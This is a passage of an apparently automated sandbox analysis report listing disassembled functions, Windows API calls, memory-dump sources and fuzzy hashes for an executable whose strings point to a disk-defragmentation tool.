                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                                • Instruction ID: 99dff8696b896045b2b2465c2857d129e321b498c74995c08fbc344012e11459
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11A3B2D051259FF7208A10DC59BEB7BB9EB40310F0100F6E90DAB291D6795EC5CEA2
                                                                                                                                                                                                                                                                                                Function 00450AF0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                                • Instruction ID: e00db402275725e990652d892f8b971178a2964019ba86a459431eb368788478
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF0F6C2C159009EF3184254ECABBBB3518DB90326F1842BFEA4B044C6A56C3FC94567
                                                                                                                                                                                                                                                                                                Function 00450F77 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                                • Instruction ID: f968807da2bbe673111a2d6e16995004d545fd51fd9e77028d14e4298e1144a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C012F14003045AF7008A60EC8ABAA7628D700351F148071ED0D54181862D4E964913

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 00441903 Relevance: 60.8, Strings: 48, Instructions: 815COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: D$D$D$E$I$L$N$Q$R$T$a$a$a$a$a$c$c$e$e$e$e$e$f$g$i$l$l$l$m$n$o$o$o$r$r$r$r$t$t$t$t$t$t$u$u$y$y$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-795291402
                                                                                                                                                                                                                                                                                                • Opcode ID: 9c3c65fd969f292dabcc0fa9abe2f6d4db4770207e0ed296841166f48074e304
                                                                                                                                                                                                                                                                                                • Instruction ID: 7122a4342d64c85fee3a90dd2b4f37f44516dc6848c46918cd2647176de98852
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c3c65fd969f292dabcc0fa9abe2f6d4db4770207e0ed296841166f48074e304
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E72EEB1D042A88BFB248B24CC44BEABBB1EB85304F1441FAD44DA6281D77D5EC5CF66
                                                                                                                                                                                                                                                                                                Function 0041FAB0 Relevance: 47.5, APIs: 7, Strings: 20, Instructions: 275windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                                • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131
                                                                                                                                                                                                                                                                                                • API String ID: 1040333723-179025603
                                                                                                                                                                                                                                                                                                • Opcode ID: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                                • Instruction ID: 83c1616b1d25a5f5e88f9c25e0e2a21432fc20987b46dd7eda8cdac89d290607
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7811FF0FA031036E794AAA59C53FEB31686F44B44F20C81F760EB25D5C9ACA84556ED
                                                                                                                                                                                                                                                                                                Function 0041B4B0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 135serviceCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4C2
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4DD
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,1088D068), ref: 0041B4EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                                • String ID: VSS
                                                                                                                                                                                                                                                                                                • API String ID: 4136619037-4102325705
                                                                                                                                                                                                                                                                                                • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                                Function 00411150 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                                • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                                Function 004197C0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 287comCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                                • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                                • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                                • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
